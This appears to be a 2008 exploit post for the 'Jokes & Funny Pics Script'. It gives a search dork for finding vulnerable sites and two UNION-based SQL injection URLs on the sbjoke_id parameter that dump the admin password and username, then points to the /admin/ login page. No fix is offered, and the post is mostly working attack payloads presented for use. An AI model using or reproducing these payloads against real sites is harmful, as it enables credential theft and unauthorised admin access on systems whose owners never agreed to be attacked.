Jokes & Funny Pics Script (sb_jokeid) SQL Injection Vulnerability

2008-06-25 00:00:00

#########################################################
#
# Jokes & Funny Pics Script SQL Injection Vulnerability
#========================================================
#
# Author: Hussin X
#
# Home : www.tryag.cc/cc
#
# email: darkangel_g85[at]Yahoo[DoT]com
# hussin.x[at]hotmail[DoT]com
#
#========================================================
# HomE script : http://www.softbizscripts.com
#
# Demo : http://www.softbizscripts.com/scripts/jokes
#
# DorK : "index.php?sbjoke_id="

##########################################################

Exploit:


http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--


Exploit: 2

index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin--

Login :

/admin/


################################################################################
####################################( Greetz )##################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #
# Silic0n / Rafi / FAHD / Iraqihack #
# #
#################################(and All IRAQIs)###############################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.